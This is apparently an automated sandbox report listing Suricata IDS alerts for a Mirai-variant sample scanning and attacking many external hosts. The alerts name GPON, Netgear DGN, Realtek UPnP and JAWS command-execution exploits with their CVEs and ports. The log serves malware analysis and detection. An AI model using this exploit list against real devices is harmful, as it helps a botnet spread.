                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42400 -> 102.193.207.146:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:53628 -> 210.236.235.55:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:34262 -> 30.84.48.130:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:49262 -> 55.92.215.83:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:53088 -> 68.228.150.77:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:38934 -> 140.221.39.242:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:43916 -> 105.45.143.155:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:45012 -> 137.62.189.193:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:45222 -> 11.190.108.117:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:49030 -> 9.179.110.111:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:36598 -> 152.206.32.137:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:35764 -> 9.31.4.141:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:53006 -> 180.158.189.190:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:51822 -> 120.121.182.155:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:34178 -> 15.238.152.127:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:46204 -> 153.97.17.195:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:51976 -> 28.36.92.242:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:44862 -> 214.89.56.229:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:52624 -> 52.116.215.210:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:34086 -> 75.89.77.206:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:58492 -> 81.241.101.2:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:57430 -> 109.90.191.175:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:57024 -> 24.158.93.235:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:58462 -> 170.20.179.231:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:50950 -> 58.130.138.131:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:60608 -> 28.115.34.207:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:46996 -> 136.27.141.23:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:54464 -> 40.134.41.147:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:46042 -> 193.206.30.210:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:45848 -> 131.57.28.181:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:45072 -> 209.161.87.32:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:49042 -> 142.0.210.253:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:59610 -> 103.210.62.103:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:37136 -> 197.96.116.135:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:46302 -> 187.46.100.111:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:53618 -> 9.27.194.149:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:54816 -> 167.138.9.251:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:37414 -> 44.153.13.5:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:50212 -> 68.10.114.24:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:36546 -> 217.237.6.188:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:41208 -> 149.132.110.240:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36014 -> 133.133.78.165:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:35108 -> 38.7.77.71:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:49594 -> 155.174.193.236:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50116 -> 80.12.206.237:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:40486 -> 56.165.139.2:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36014 -> 133.133.78.165:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57598 -> 75.158.5.139:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56158 -> 166.105.236.182:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35144 -> 90.72.116.28:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40806 -> 110.44.0.102:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37466 -> 14.55.151.40:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32862 -> 218.240.42.107:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33380 -> 176.126.172.174:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:46152 -> 195.214.23.156:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:56326 -> 23.120.155.208:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43140 -> 97.121.163.0:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51534 -> 18.236.8.199:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36954 -> 94.134.209.196:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36954 -> 94.134.209.196:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57650 -> 156.166.198.160:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59396 -> 148.252.76.108:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56232 -> 86.252.168.14:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42354 -> 9.56.220.231:49152
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56232 -> 86.252.168.14:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:56390 -> 146.211.235.115:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:36932 -> 210.146.43.159:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50310 -> 119.24.183.33:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34918 -> 25.125.5.55:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41548 -> 66.141.72.196:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34870 -> 11.3.1.179:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39552 -> 84.5.28.114:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58060 -> 148.76.110.167:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60844 -> 53.174.185.180:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:54262 -> 205.135.69.220:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58726 -> 2.243.56.199:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53778 -> 141.244.188.12:49152
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:58060 -> 148.76.110.167:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34870 -> 11.3.1.179:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:44560 -> 157.237.189.119:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60376 -> 79.254.93.26:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57606 -> 53.189.162.142:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57606 -> 53.189.162.142:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39868 -> 209.78.212.21:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58586 -> 65.22.127.93:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52716 -> 22.32.12.201:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:52944 -> 41.90.240.235:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53202 -> 123.87.2.237:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:49448 -> 31.112.217.42:8080
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53202 -> 123.87.2.237:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:58726 -> 2.243.56.199:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54604 -> 95.159.40.251:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53776 -> 196.163.229.29:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48998 -> 182.151.249.38:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48998 -> 182.151.249.38:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43462 -> 142.149.121.92:5555
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:42708 -> 110.69.45.221:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53132 -> 175.176.33.31:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60262 -> 79.141.55.107:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44994 -> 77.47.103.213:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:51200 -> 28.15.254.21:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35580 -> 47.234.28.192:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:39666 -> 18.64.144.254:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:51858 -> 154.99.164.58:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52534 -> 16.156.233.47:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60010 -> 173.66.249.230:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40192 -> 146.25.213.174:49152
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:60674 -> 220.112.244.93:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:49866 -> 56.59.236.152:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41060 -> 105.175.75.134:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54634 -> 155.64.195.25:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48266 -> 125.76.215.12:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:47578 -> 146.120.170.183:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41894 -> 121.122.226.155:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57344 -> 188.62.117.113:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41894 -> 121.122.226.155:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33322 -> 152.225.48.236:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43296 -> 221.219.229.131:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54156 -> 36.44.154.230:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44986 -> 191.45.226.73:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37714 -> 63.200.102.171:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55898 -> 19.97.225.232:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38508 -> 58.88.196.167:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55158 -> 83.172.215.118:5555
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:42546 -> 110.87.214.87:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37600 -> 20.191.233.24:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59062 -> 152.17.230.207:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50712 -> 82.222.192.8:49152
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37600 -> 20.191.233.24:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52716 -> 22.32.12.201:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52534 -> 16.156.233.47:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46276 -> 26.133.106.54:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:35736 -> 81.191.165.190:8080
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46276 -> 26.133.106.54:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60262 -> 79.141.55.107:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:59518 -> 64.105.173.62:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:58972 -> 122.91.172.146:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:37510 -> 159.175.193.207:52869
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:49390 -> 44.237.251.105:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39610 -> 105.99.123.173:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33998 -> 118.181.71.158:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45914 -> 99.57.40.174:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:53684 -> 123.224.87.233:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51846 -> 166.252.165.142:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:50288 -> 47.171.207.61:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52390 -> 201.188.175.229:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:46124 -> 75.38.117.87:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37048 -> 58.181.145.4:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50118 -> 63.93.5.53:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55336 -> 130.67.243.6:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:56744 -> 143.251.2.198:52869
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:55736 -> 164.49.37.152:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53048 -> 16.34.243.125:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48530 -> 121.133.146.20:8080
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53048 -> 16.34.243.125:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:49260 -> 171.64.132.184:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:51220 -> 3.178.63.133:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:52552 -> 122.78.77.224:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:35962 -> 220.226.175.253:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41004 -> 145.189.228.46:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:40882 -> 13.117.120.129:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:54824 -> 67.150.217.162:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:44298 -> 68.239.15.161:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48936 -> 200.60.162.40:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48936 -> 200.60.162.40:80
